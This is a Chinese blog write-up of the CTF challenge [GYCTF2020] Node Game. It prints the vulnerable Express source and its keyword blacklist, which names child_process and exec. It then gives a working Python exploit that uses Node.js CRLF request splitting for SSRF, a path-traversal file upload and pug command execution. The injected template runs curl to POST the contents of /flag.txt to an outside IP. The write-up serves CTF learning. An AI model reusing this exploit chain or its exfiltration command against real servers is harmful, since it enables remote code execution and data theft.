[GYCTF2020]Node Game

于 2023-02-12 21:39:28 发布
阅读量371 收藏
点赞数
分类专栏: BUUCTF 文章标签: javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/129000051
版权 
知识点:nodejs 的 CRLF ,pug 命令执行和文件包含

审计

这边就不多赘述了:下面大佬讲的就很清楚

https://blog.csdn.net/cjdgg/article/details/119068329

要注意的就是这个 CRLF 编码后攻击的时候总是崩溃,试了半天才成功,不知道是不是之前的数据包有问题。

var express = require('express');
var app = express();
var fs = require('fs');
var path = require('path');
var http = require('http');
var pug = require('pug');//模板渲染
var morgan = require('morgan');//日志
const multer = require('multer');// 用于处理multipart/form-data类型的表单数据,实现上传功能;


app.use(multer({dest: './dist'}).array('file'));
app.use(morgan('short'));
app.use("/uploads",express.static(path.join(__dirname, '/uploads')))
app.use("/template",express.static(path.join(__dirname, '/template')))


app.get('/', function(req, res) {
    var action = req.query.action?req.query.action:"index";
    if( action.includes("/") || action.includes("\\") ){
        res.send("Errrrr, You have been Blocked");
    }
    file = path.join(__dirname + '/template/'+ action +'.pug');
    var html = pug.renderFile(file);
    res.send(html);
});

app.post('/file_upload', function(req, res){
    var ip = req.connection.remoteAddress;
    var obj = {
        msg: '',
    }
    if (!ip.includes('127.0.0.1')) {
        obj.msg="only admin's ip can use it"
        res.send(JSON.stringify(obj));
        return 
    }
    fs.readFile(req.files[0].path, function(err, data){
        if(err){
            obj.msg = 'upload failed';
            res.send(JSON.stringify(obj));
        }else{
            var file_path = '/uploads/' + req.files[0].mimetype +"/";
            var file_name = req.files[0].originalname
            var dir_file = __dirname + file_path + file_name
            if(!fs.existsSync(__dirname + file_path)){
                try {
                    fs.mkdirSync(__dirname + file_path)
                } catch (error) {
                    obj.msg = "file type error";
                    res.send(JSON.stringify(obj));
                    return
                }
            }
            try {
                fs.writeFileSync(dir_file,data)
                obj = {
                    msg: 'upload success',
                    filename: file_path + file_name
                } 
            } catch (error) {
                obj.msg = 'upload failed';
            }
            res.send(JSON.stringify(obj));    
        }
    })
})

app.get('/source', function(req, res) {
    res.sendFile(path.join(__dirname + '/template/source.txt'));
});


app.get('/core', function(req, res) {
    var q = req.query.q;
    var resp = "";
    if (q) {
        var url = 'http://localhost:8081/source?' + q
        console.log(url)
        var trigger = blacklist(url);
        if (trigger === true) {
            res.send("<p>error occurs!</p>");
        } else {
            try {
                http.get(url, function(resp) {
                    resp.setEncoding('utf8');
                    resp.on('error', function(err) {
                    if (err.code === "ECONNRESET") {
                     console.log("Timeout occurs");
                     return;
                    }
                   });

                    resp.on('data', function(chunk) {
                        try {
                         resps = chunk.toString();
                         res.send(resps);
                        }catch (e) {
                           res.send(e.message);
                        }
 
                    }).on('error', (e) => {
                         res.send(e.message);});
                });
            } catch (error) {
                console.log(error);
            }
        }
    } else {
        res.send("search param 'q' missing!");
    }
})

function blacklist(url) {
    var evilwords = ["global", "process","mainModule","require","root","child_process","exec","\"","'","!"];
    var arrayLen = evilwords.length;
    for (var i = 0; i < arrayLen; i++) {
        const trigger = url.includes(evilwords[i]);
        if (trigger === true) {
            return true
        }
    }
}

var server = app.listen(8081, function() {
    var host = server.address().address
    var port = server.address().port
    console.log("Example app listening at http://%s:%s", host, port)
})

payload:
把 vps 替换一下就可以了,也可以用有相似功能的网站,或者其他的方法。

import urllib.parse
import requests

payload = """

POST /file_upload HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------79799747022511107691492167111
Content-Length:1000
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/?action=upload
Upgrade-Insecure-Requests: 1

-----------------------------79799747022511107691492167111
Content-Disposition: form-data; name="file"; filename="shell.pug"
Content-Type: ../template

- global.process.mainModule.require('child_process').execSync('curl 82.157.69.84:12345 -X POST -d `cat /flag.txt`')
-----------------------------79799747022511107691492167111--


""".replace("\n", "\r\n")


def payload_encode(raw):
    ret = u""
    for i in raw:
        ret += chr(0x0100 + ord(i))  # 替换为高编码unicode字符
    return ret


payload = payload_encode(payload)
print(payload)

r = requests.get('http://5f09d3d5-09ee-4742-a142-40df87c9ccf5.node4.buuoj.cn:81/core?q=' + urllib.parse.quote(payload))
print(r.text)
r = requests.get('http://5f09d3d5-09ee-4742-a142-40df87c9ccf5.node4.buuoj.cn:81/?action=shell')

nc 一下就可以了。
在这里插入图片描述

succ3
关注
专栏目录
node.js出现version `GLIBC_2.27‘ not found的解决方案
weixin_43178406的博客
12-03 3万+
 本文主要介绍了node.js出现version `GLIBC_2.27’ not found的解决方案,希望能对使用node的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
K8s(十一):Pod 的 Node Selector详解
最新发布
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
04-06 1万+
🔴 K8s(十一):Pod 的 Node Selector详解
nodegame-server:浏览器和node.js的nodeGame服务器
04-08
节点游戏服务器 nodegame服务器是服务器 。 处理多个连接,创建需求,等候室和游戏室。 资源 执照
[GYCTF2020]Node Game-nodejs通过拆分攻击实现的SSRF攻击
cjdgg的博客
08-16 1620
[GYCTF2020]Node Game 漏洞:通过拆分请求实现的SSRF攻击 假设一个服务器,接受用户输入,并将其包含在通过HTTP公开的内部服务请求中,像这样: GET /private-api?q=<user-input-here> HTTP/1.1 Authorization: server-secret-key 如果服务器未正确验证用户输入,则攻击者可能会直接注入协议控制字符到请求里。假设在这种情况下服务器接受了以下用户输入: "x HTTP/1.1\r\n\r\nDELETE /p
从 [GYCTF2020]Node Game 了解 nodejs HTTP拆分攻击
ShenZ的博客
08-29 1011
nodejs HTTP拆分攻击 nodejs 8.12 Node.js API 文档 当 Node.js 使用 http.get 向特定路径发出HTTP 请求时,发出的请求实际上被定向到了不一样的路径,这是因为NodeJS 中 Unicode 字符损坏导致的 HTTP 拆分攻击 原理 Unicode原理 对于不包含主体的请求,Node.js默认使用“latin1”,这是一种单字节编码字符集,不能表示高编号的Unicode字符,例如????这个表情。所以,当我们的请求路径中含有多字节编码的Unico
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 815
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1639
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
BUUCTF-PWN gyctf_2020_force(house of force)
weixin_44145820的博客
04-15 1411
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
node漏洞 【持续更新】
weixin_51458899的博客
02-24 1704
node漏洞 持续更新
Week小结
qq_61209261的博客
07-15 352
Web安全学习
一道题学习node.js中的CRLF注入
m0_62422842的博客
11-11 1820
这几天刷题遇到在node.js题目中注入CRLF实现ssrf的题目,对于我来说知识听新颖。在此记录一下。
BUUCTF-刷题记录-10
qq_45628145的博客
10-07 1391
MISC [watevrCTF 2019]Unspaellablle 词频分析,没有什么结果,然后看文件前面很有规律的样子,看起来像个什么文章?直接谷歌搜索到一个差不多的,不过有一点区别,链接。 然后去linux下面使用vimdiff命令查看两个文件的差别,发现把差别字符提取出来也就是flag了。 vimdiff 1.txt 2.txt 也就是watevr{icantspeel_tiny.cc/2qtdez}。 [INSHack2018]Spreadshit 搜索空格,全部选中,发现flag:INSA{
GYCTF2020_Writeup
Lethe's Blog
03-15 2626
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
[GYCTF 2020] Web复现 wp
Alexhirchi的博客
07-30 1699
FlaskApp 要点:模板注入、Pin码 访问网站,提示了该网站由Flask框架搭建,进行简单测试,提供了base64加密和解密的功能,并开启了flask的dubug功能(输入错误的base64解码会出现报错界面) 猜测存在模板注入,构造payload:{{2+6}} base64加密,将结果进行解码,验证存在模板注入 构造payload获取python文件内容(通过之前的报错可以知道python文件名),循环查找catch_warnings,打开app.py读取内容 {% for c in []
i春秋2020新春疫战 非SQL题目解析
a3320315的博客
02-25 1184
Ezupload 这道题目可能是师傅的失误,在上传后缀名过滤的数组中有一些失误~~ 导致直接上传php马,得到flag~~ 这儿贴一下上传shell查看的源码 <?php error_reporting(0); header("Content-type: text/html; charset=utf-8"); $sandbox='sandbox/'.md5($_SERVER['remote_...
GYCTF 2020-BFnote题目分析
Eagle_hwei的博客
03-14 869
BFnote的题目分析 2020-03-1408:28:02 by hawkJW 题目附件、ida文件及wp链接   自己太菜了,这道题里面包含的一些知识点和思路确实是以前完全没有接触过的。。。特别学习一下 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所示 可以看到,仅仅是没有开启PIE保护,其余基本上保护都开启了,保护还是比较严格的。 下面我们来粗...
[GYCTF2020]Ezsqli
SopRomeo的博客
07-21 1129
话不多说,直接注 fuzz一波,发现输入分号和单引号无果,并且过滤了关键字符 猜测整形注入 无果,尝试异或注入 发现可行,这个注入我做的挺多了,就不细说了,具体可以去看我的博文 极客大挑战finalsql 注入的时候发现他过滤or 这样我们的information就不能用了 换成innodb_table_stats绕过也无果 发现sys.x$schema_flattened_keys 或者 sys.schema_table_statistics_with_buffer可以替代上面那个,果然条条道路通
VScode中无法识别Node.js的解决方法
Node.js 在 VSCode 中无法运行的解决方法 **知识点 1:** Node.js 是什么? Node.js 是一个基于 Chrome V8 JavaScript 引擎的 JavaScript 运行环境,可以在服务器端运行 JavaScript 代码。Node.js 提供了一个事件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值